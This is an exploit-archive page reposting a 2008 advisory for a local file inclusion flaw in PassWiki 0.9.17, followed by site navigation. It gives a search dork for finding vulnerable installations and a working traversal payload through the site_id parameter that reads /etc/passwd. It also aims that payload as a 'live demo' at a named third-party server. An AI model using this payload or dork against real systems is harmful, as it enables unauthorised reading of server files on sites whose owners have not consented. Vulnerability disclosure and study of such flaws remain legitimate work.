passwiki0917-lfi.txt

passwiki0917-lfi.txt: Posted Oct 21, 2008; Authored by r45c4l | Site darkc0de.com; PassWiki versions 0.9.17 and below suffer from a local file inclusion vulnerability. This is a five month old vulnerability that remains unpatched as new versions come out. Consumer beware!; tags | exploit, local, file inclusion; SHA-256 | 8c02bbaa5018efa02295c143cae09f3f5d92e2b4db38cc33d72126868b1316d4; Download | Favorite | View

passwiki0917-lfi.txt

################################################################ 
#       .___             __          _______       .___        # 
#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
#        \/                  \/             \/                 # 
#                   ___________   ______  _  __                # 
#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
#                 \  \___|  | \/\  ___/\     /                 # 
#                  \___  >__|    \___  >\/\_/                  # 
#      est.2007        \/            \/   forum.darkc0de.com   # 
################################################################ 
# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu     # 
#-Marezzi-P47tr1ck- FeDeReR-MAGE-JeTFyrE- DON-Outlawz-aymbrbr  #
#        and all darkc0de and DarkTrix members              ---# 
################################################################ 
# 
# Author: r45c4l 
# 
# Home  : www.darkc0de.com & darktrix.info
# 
# Email : r45c4l@hotmail.com 
# 
# Share the c0de! 
# 
################################################################ 
# 
# Title: PassWiki 0.9.17 "site_id" Local File Inclusion Vulnerability
# 
#
###########################################################
#
# d0rk: "powered by PassWiki 0.9.17"
#
###########################################################
 
     This is taken from the original advisory which was provided by mozi2weed[at]yahoo[dot]com, here http://milw0rm.com/exploits/5704.

     The affected version was 0.9.16 RC 3 and the solution was suggested to upgrade to version 0.9.17, which can be found here 

     http://secunia.com/advisories/30496/


     POC: 

  http://site.com/[path]/passwiki.php?site_id=../../../../../../../../../../../../../etc/passwd%00

     Live Dem0:

  http://w3.funsrv.com/~konjo/passwiki/passwiki.php?site_id=../../../../../../../../../../../../../etc/passwd%00




###########################################################
#
#  Bug discovered : 20 Oct 2008
###########################################################

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

passwiki0917-lfi.txt

passwiki0917-lfi.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

passwiki0917-lfi.txt

Share This

passwiki0917-lfi.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems